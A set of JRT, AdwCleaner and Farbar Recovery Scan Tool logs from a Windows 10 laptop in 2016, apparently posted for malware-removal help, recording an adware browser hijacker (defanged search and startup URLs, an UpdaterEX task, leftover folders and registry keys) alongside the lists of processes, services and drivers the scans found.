Successfully deleted: C:\WINDOWS\system32\Tasks\UpdaterEX (Task)
Successfully deleted: C:\WINDOWS\Tasks\UpdaterEX.job (Task) 
 
 
 
Registry: 2 
 
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{717FAF8D-04D7-4787-9DDE-7002B2B3BB74} (Registry Key)
Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{717FAF8D-04D7-4787-9DDE-7002B2B3BB74} (Registry Key)
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 02/23/2016 at 20:29:38.46
End of JRT log
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
AdwCleaner
 
# AdwCleaner v5.036 - Logfile created 23/02/2016 at 20:36:33
# Updated 22/02/2016 by Xplode
# Database : 2016-02-22.2 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : Jonathan - DESKTOP-FDU3B24
# Running from : C:\Users\Jonathan\Downloads\AdwCleaner (1).exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
Folder Found : C:\ProgramData\54070cb8-2431-0
Folder Found : C:\ProgramData\54070cb8-6861-0
Folder Found : C:\ProgramData\b3eda95e-5667-1
Folder Found : C:\ProgramData\b3eda95e-7691-0
Folder Found : C:\ProgramData\{08be3c40-312c-0}
Folder Found : C:\ProgramData\{2b04c619-412c-1}
 
***** [ Files ] *****
 
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
Task Found : YCMServiceAgent
 
***** [ Registry ] *****
 
Key Found : HKCU\Software\UpdaterEX
Key Found : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\driverupdate.net
Key Found : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.driverupdate.net
Key Found : HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\driverupdate.net
Key Found : HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.driverupdate.net
 
***** [ Web browsers ] *****
 
[C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : aol.com
[C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : ask.com
[C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Found : hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU
[C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Default_Search_Provider_Data] Found : hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTQkcFME0FBloEURNNfWpdAEsSSX5NL04=&q={searchTerms}
 
*************************
 
C:\AdwCleaner\AdwCleaner[S1].txt - [2732 bytes] - [23/02/2016 20:32:19]
C:\AdwCleaner\AdwCleaner[S2].txt - [2653 bytes] - [23/02/2016 20:36:33]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [2726 bytes] ##########
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:17-02-2016
Ran by Jonathan (administrator) on DESKTOP-FDU3B24 (23-02-2016 20:40:51)
Running from C:\Users\Jonathan\Downloads
Loaded Profiles: Jonathan (Available Profiles: Jonathan)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Opera)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\AVAST Software\SecureLine\vpnsvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera_crashreporter.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Opera Software) C:\Program Files (x86)\Opera\35.0.2066.37\opera.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
() C:\Users\Jonathan\Downloads\AdwCleaner (1).exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8510680 2015-07-27] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3945656 2015-10-31] (Synaptics Incorporated)
HKLM\...\Run: [PDF Converter Elite 4.0 Print Dispatcher] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe [9742040 2016-01-04] (PDFConverter.com)
HKLM\...\Run: [PDF Converter Elite 4.0 Notifier] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PCENotifier.exe [1231576 2016-01-04] (PDFConverter.com)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [127528 2015-07-08] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [PowerDVD14Agent] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe [795336 2015-06-21] (CyberLink Corp.)
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\...\RunOnce: [Uninstall C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ca94292e-303f-4358-9c9a-bb0b532e4af4}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://hp15-comm.msn.com/?pc=HRTE
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-2478984944-2039465796-333368353-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2016-01-18] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-18] (Microsoft Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-04-30] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\2\NP_wtapp.dll [2016-01-05] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
      
CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTQkcFME0FBloEURNNfWpdAEsSSX5NL04=&q={searchTerms}
CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFFCcl8IVF1IDFRFIlgVVQAXQxgbc1gMTA4VFQRBIw5cVApGQxNBNARaAktXUUEeJ1pNER8fHGZGIUtbCXIfTkI=
CHR Profile: C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-10-31]
CHR Extension: (Docs) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-31]
CHR Extension: (Google Drive) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-31]
CHR Extension: (YouTube) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-31]
CHR Extension: (Google Search) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-10-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-10-31]
CHR Extension: (Gmail) - C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-31]
 
Opera: 
=======
OPR StartupUrls: "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)
R2 esifsvc; C:\Windows\SysWOW64\esif_uf.exe [1385640 2015-07-19] (Intel Corporation)
R2 HPSupportSolutionsFrameworkService; c:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-07-17] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [223520 2015-07-11] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [298200 2015-07-27] (Realtek Semiconductor)
R2 SecureLine; C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe [452456 2016-01-01] ()
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-10-31] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 clwvd6; C:\Windows\system32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R3 dptf_cpu; C:\Windows\System32\drivers\dptf_cpu.sys [43000 2015-07-19] (Intel Corporation)
R3 esif_lf; C:\Windows\system32\DRIVERS\esif_lf.sys [251384 2015-07-19] (Intel Corporation)
R0 IntelHSWPcc; C:\Windows\System32\drivers\IntelPcc.sys [88256 2015-07-21] (Intel Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-07] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [886528 2015-06-01] (Realtek                                            )
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [753368 2015-07-21] (Realsil Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [4619520 2015-07-22] (Realtek Semiconductor Corporation                           )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [33448 2015-07-27] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-10-31] (Synaptics Incorporated)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-23 20:32 - 2016-02-23 20:36 - 00000000 ____D C:\AdwCleaner
2016-02-23 20:29 - 2016-02-23 20:29 - 00001100 _____ C:\Users\Jonathan\Desktop\JRT.txt
2016-02-23 20:27 - 2016-02-23 20:32 - 01511936 _____ C:\Users\Jonathan\Downloads\AdwCleaner (1).exe
2016-02-23 20:27 - 2016-02-23 20:27 - 01511936 _____ C:\Users\Jonathan\Downloads\AdwCleaner.exe
2016-02-23 20:26 - 2016-02-23 20:26 - 01609216 _____ (Malwarebytes) C:\Users\Jonathan\Downloads\JRT (1).exe
2016-02-23 20:25 - 2016-02-23 20:27 - 01609216 _____ (Malwarebytes) C:\Users\Jonathan\Downloads\JRT.exe
2016-02-20 09:04 - 2016-02-20 09:04 - 00000000 ____D C:\Users\Jonathan\AppData\Local\Apps\2.0
2016-02-19 21:32 - 2016-02-22 16:11 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-19 21:32 - 2016-02-19 21:32 - 00001178 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-02-19 21:32 - 2016-02-19 21:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-02-19 21:32 - 2016-02-19 21:32 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-19 21:32 - 2016-02-19 21:32 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-19 21:32 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-19 21:32 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-19 21:32 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-19 21:29 - 2016-02-19 21:31 - 22908888 _____ (Malwarebytes ) C:\Users\Jonathan\Downloads\mbam-setup-org-2.2.0.1024.exe
2016-02-19 15:39 - 2016-02-19 15:40 - 00000000 ____D C:\Users\Jonathan\Documents\FRST
2016-02-19 15:34 - 2016-02-19 15:34 - 00049277 _____ C:\Users\Jonathan\Downloads\Addition.txt
2016-02-19 15:32 - 2016-02-23 20:40 - 00017882 _____ C:\Users\Jonathan\Downloads\FRST.txt
2016-02-19 15:32 - 2016-02-23 20:40 - 00000000 ____D C:\FRST
2016-02-19 15:32 - 2016-02-19 15:32 - 02371072 _____ (Farbar) C:\Users\Jonathan\Downloads\FRST64.exe
2016-02-19 13:16 - 2016-01-27 00:45 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-02-19 13:16 - 2016-01-27 00:10 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-19 13:16 - 2016-01-27 00:05 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-19 13:16 - 2016-01-26 23:58 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-19 13:16 - 2016-01-26 23:54 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-19 13:15 - 2016-01-29 01:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-19 13:15 - 2016-01-29 01:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-19 13:15 - 2016-01-27 01:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-19 13:15 - 2016-01-27 01:15 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-19 13:15 - 2016-01-27 01:01 - 07476064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-02-19 13:15 - 2016-01-27 01:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-19 13:15 - 2016-01-27 01:01 - 01819720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-19 13:15 - 2016-01-27 00:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-19 13:15 - 2016-01-27 00:57 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-02-19 13:15 - 2016-01-27 00:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-19 13:15 - 2016-01-27 00:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-19 13:15 - 2016-01-27 00:56 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-02-19 13:15 - 2016-01-27 00:55 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-02-19 13:15 - 2016-01-27 00:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-19 13:15 - 2016-01-27 00:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-19 13:15 - 2016-01-27 00:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-19 13:15 - 2016-01-27 00:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-19 13:15 - 2016-01-27 00:45 - 06605544 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
